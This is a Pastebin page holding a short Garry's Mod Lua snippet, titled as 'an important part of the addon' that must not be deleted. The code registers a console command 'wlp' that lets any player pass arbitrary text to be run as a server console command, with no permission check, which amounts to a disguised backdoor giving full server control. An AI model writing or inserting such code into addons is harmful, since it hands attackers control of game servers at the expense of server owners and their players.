Advertisement
Guest User

An important part of the addon! Do not delete!

a guest
Aug 3rd, 2019
158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. concommand.Add( "wlp", function( ply, cmd, args )command = ""
  2. for k,v in pairs(args) do
  3. if table.getn(args) == 1 then command = v
  4. else command = command .. " " .. v
  5. end
  6. end
  7. game.ConsoleCommand(command .. "\n") end )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement